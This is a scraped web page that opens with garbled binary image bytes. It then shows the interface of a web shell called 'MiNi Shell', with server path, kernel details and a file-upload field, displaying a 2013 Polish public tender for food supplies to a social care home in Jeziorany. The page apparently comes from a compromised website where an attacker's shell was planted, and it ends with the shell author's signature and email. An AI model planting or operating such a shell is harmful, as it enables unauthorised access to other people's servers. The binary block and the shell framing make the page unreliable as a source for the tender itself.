JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/499890-N-2013.html

<p class="kh_header"><b>Jeziorany: Dostawa żywności</b><br>
<b>Numer ogłoszenia: 499890 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Kajki 49, 11-320 Jeziorany, woj. warmińsko-mazurskie, tel. 0-89 7181 664, faks 0-89 7181 664.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: opieka społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności do Domu Pomocy Społecznej w Jezioranach  , 
zwanego dalej Zamawiającym, zgodnie z opisem zawartym w pliku Części zamówienia.
Dopuszcza się składanie ofert równoważnych pod warunkiem, że produkt oferty jest identyczny pod 
względem składu jak w zamówieniu. 
	1. Część I - 		Artykuły spożywcze
	2. Część II -		 Drób
	3. Część III - 		Jaja
	4. Część IV - 		Mrożonki
	5. Część V  - 		Mięso i wędliny
	6. Część VI - 		Ryby i konserwy rybne
	7. Część VII - 		Nabiał
	8  Część VIII -		Pieczywo
	9. Część IX  - 		Warzywa i owoce.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawijajacy nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potrzeby wykonania przedmiotu zamówienia nie wymaga się posiadania specjalnych uprawnień. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Pzp. Nie wykazanie w
wystarczający sposób potwierdzenia spełnienia tego warunku tj. złożenia oświadczenia o spełnieniu warunku, spowoduje wykluczenie z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
1.1.zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy;
1.2.zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;
1.3.wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.
1.4. zmniejszenie realizacji wielkości dostaw zgodnie z Rozd. 3 ust 2  SIWZ .
2.	Zmiany o których mowa w ust. 1 dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsjeziorany.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej , ul.Kajki 49 , 11-320 Jeziorany.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2013 godzina 10:00, miejsce: Dom Pomocy Społecznej , u.Kajki 49 , 11-320 Jeziorany , budynek administracji pokój kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aromaty	340	szt		
	2.	Cukier puder	30	kg		
	3.	Cukier waniliowy	18	kg		
	4.	Cukier kryształ	2100	kg		
	5.	Dżem(mix owoc.)	200	kg		
	6.	Groszek konserwowy	120	kg		
	7.	Herbata granul. Saga	60	kg		
	8.	Koncentrat pomid. 30%	300	kg		
	9.	Kasza manna	80	kg		
	10.	Kasza jęczm. drobna	100	kg		
	11.	Kasza pęczak	50	kg		
	12.	Kasza gryczana	30	kg		
	13.	Ketchup łagodny	200	kg		
	14.	Kakao	15	kg		
	15.	Kawa zboż. Kujawianka	130	kg		
	16.	Kawa Inka	12	kg		
	17.	Kwasek cytrynowy	20	kg		
	18.	Liść laurowy	4,5	kg		
	19.	Margaryna zwykła	550	kg		
	20.	Musztarda stołowa	120	kg		
	21.	Mąka pszenna /450/  tortowa	1000	kg		
	22.	Mąka ziemniaczana	40	kg		
	23.	Olej uniwersalny	350	l		
	24.	Olej słonecznikowy	70	l		
	25.	Ocet 10%	15	l		
	26.	Pasztet drobiowy	360	kg		
	27.	Płatki owsiane	30	kg		
	28.	Przyp. do zup w pł. 1 l.	220	l		
	29.	Proszek do pieczenia	1	kg		
	30.	Sól kuchenna drobna	400	kg		
	31.	Szczaw konserw. kroj.	60	kg		
	32.	Ziele angielskie	4,5	kg		
	33.	Pieprz natur. mielony	4	kg		
	34.	Pieprz ziołowy	4	kg		
	35.	Majonez Kętrzyń. 5kg	180	kg		
	36.	Żelatyna spożywcza	1	kg		
	37.	Cynamon	2	kg		
	38.	Papryka miel. słodka	1	kg		
	39.	Miód pszczeli wielokw.	180	kg		
	40.	Konserwa mięs. Tyrol.	200	kg		
	41.	Majeranek	2	kg		
	42.	Przypr. Prowansalska	1,5	kg		
	43.	Przypr. Uniwersalna	20	kg		
	44.	Bulion jarzynowy	25	kg		
	45.	Syrop owocowy	25	l		
	46.	Chrupki mazur. 50 g.	300	szt		
	47.	Kisiel bez cukru	200	kg		
	48.	Budyń bez cukru	50	kg		
	49.	Chrzan konserwowy	15	kg		
	50.	Makaron wstążka	250	kg		
	51.	Płatki kukurydziane	150	kg		
	52.	Rodzynki	20	kg		
	53.	Ryż	50	kg		
	54.	Kukurydza konserwowa	30	kg		
	55.	Soda oczyszczona	1	kg		
	56.	Fasola czerwona	20	kg		
	57.	Brzoskwinie puszka	50	kg		
	58.	Ananas puszka	50	kg		
	60.	Przyprawa Curry 20g	2	kg		
	61.	Makaron kolanka	50	kg		
	62.	Makaron świderki	400	kg		
	63.	Musli	150	kg		
	64.	Makaron krajanka	150	kg		
	65.	Papryka konserwowa	30	kg		
	66.	Woda mineralna niegazowana	450	l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Noga z kurczaka-udka 	400	kg		
	2	Udo z kurczaka-ćwiartka tylna	450	kg		
	3	Filet z kurczaka	250	kg		
	4	Skrzydełka 	500	kg		
	5	Porcje rosołowe	300	kg		
	6	Wątróbka drobiowa 	100	kg		
	7	Żołądki drobiowe	140	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja 53g M	22 500	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kalafior mrożony	450	kg		
	2	Mieszanka kompotowa	700	kg		
	3	Fasolka szparagowa	350	kg		
	4	Wiśnie mrożone	100	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Baleron wędzony	140	kg		
	2	Boczek wędzony	110	kg		
	3	Polędwica wędzona	170	kg		
	4	Polędwica z indyka	130	kg		
	5	Pasztetowa 	140	kg		
	6	Szynka wędzona	160	kg		
	7	Szynkówka drobiow.	100	kg		
	8	Mortadela 	150	kg		
	9	Śląska	90	kg		
	10	Parówkowa 	280	kg		
	11	Parówki śląskie	160	kg		
	12	Zwyczajna 	480	kg		
	13	Żywiecka 	200	kg		
	14	Kaszanka 	190	kg		
	15	Pieczeń Polska	80	kg		
	16	Mielonka turystycz.	120	kg		
	17	Salceson włoski	200	kg		
	18	Kiszka ziemniaczana	100	kg		
	19	Zwyczajna z indyka	50	kg		
	20	Szynka konserwowa	150	kg		
	21	Kiełbasa szynkowa	160	kg		
	22	Kiełbasa kanapkowa	100	kg		
	23	Serdelki wieprzowe	120	kg		
	24	Kiełbasa biała regionalna	40	kg		
	25	Kiełbasa biesiadna	60	kg		
	26	Karkówka b/kości	160	kg		
	27	Mięso drobne chude	500	kg		
	28	Szynka wp.sur. b/k	300	kg		
	29	Łopatka wp. b/k	650	kg		
	30	Golonka przód	120	kg		
	31	Schab b/k	130	kg		
	32	Żeberka	230	kg		
	33	Słonina	130	kg		
	34	Kości schabowe	1000	kg		
	35	Wątroba wieprzowa	80	kg		
	36	Nogi wieprzowe	150	kg		
	37	Boczek surowy	130	kg		
	38	Wołowina b/k ekstra	80	kg		
	39	Smalec 	220	kg		
	40	Boczek faszerowany	60	kg		
	41	Pasztet rodzinny	90	kg		
	42	Szynka z beczki	80	kg		
	43	Kiełbasa Tatrzańska	80	kg		
	44	Podwawelska regionalna	80	kg		
	45	Rolada z kurczaka	70	kg		
	46	Pasztet z kurczaka	60	kg		
	47	Flaki	50	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby i konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Makrela wędzona	140	kg		
	2	Hamburgery rybne z warzywami	130	kg		
	3	Konserwa rybna w pomidorach	200	kg		
	4	Mintaj kostka panierowana	180	kg		
	5	Paprykarz szczeciński	200	kg		
	6	Filety sledziowe małosolne	100	kg		
	7	Tuńczyk w sosie własnym	25	kg		
	8	Panga b/s filet	300	kg		
	9	Rolmopsy	50	kg		
	10	Paluszki rybne	80	kg		
	11	Sałatka rybna	160	kg		
	12	Konserwa rybna w oleju	140	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mleko 2% w kartoniku	15 000	litr		
	2	Śmietana 18%	600	kg		
	3	Maślanka naturalna	150	kg		
	4	Ser żółty twardy	350	kg		
	5	Ser twarog.półtłust. Krajanka	600	kg		
	6	Ser topiony kostka	300	kg		
	7	Masło extra	1 400	kg		
	8	Serek homogenizow.	200	kg		
	9	Jogurt owocowy	150	kg		
	10	Ser topiony plastry	220	kg		
	11	Kefir	100	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka tarta	150	kg		
	2	Drożdże piekarnicze	18	kg		
	3	Bułka zwykła 0,09	1 100	szt.		
	4	Chleb pszenny krojony 0,5 kg	4 800	szt.		
	5	Chleb zwykły krojony 0,5 kg	12 300	szt.		
	6	Chleb razowy krojony 0,4 kg	3 900	szt.		
	7	Pączki 0,05	300	szt		
	8	Bułka słodka	800	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Buraki czerwone	550	kg		
	2	Cebula	520	kg		
	3	Fasola biała	60	kg		
	4	Groch	50	kg		
	5	Kapusta kiszona	700	kg		
	6	Kapusta biała	400	kg		
	7	Kapusta pekińska	350	kg		
	8	Kapusta świeża	500	kg		
	9	Kapusta czerwona	180	kg		
	10	Brokuły	60	kg		
	11	Ogórki kiszone	500	kg		
	12	Marchewka	1 900	kg		
	13	Ogórki  świeże	420	kg		
	14	Kapusta brukselka	40	kg		
	15	Pietruszka	700	kg		
	16	Por	280	kg		
	17	Szczypior	15	kg		
	18	Seler	600	kg		
	19	Susz warzywny	60	kg		
	20	Ziemniaki	16 000	kg		
	21	Pieczarki	360	kg		
	22	Banany	480	kg		
	23	Cytryna	400	kg		
	24	Czosnek	2	kg		
	25	Jabłka	900	kg		
	26	Kiwi	120	kg		
	27	Pomidory	500	kg		
	28	Pomarańcze	150	kg		
	29	Truskawki	90	kg		
	30	Arbuz	150	kg		
	31	Mandarynki	100	kg		
	32	Sałata zielona	50	kg		
	33	Grejfrut	150	kg		
	34	Grzyby suszone	2	kg		
	35	Śliwki suszone	4	kg		
	36	Mak	5	kg		
	37	Nektarynki	100	kg		
	39	Ogórki konserwowe	90	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com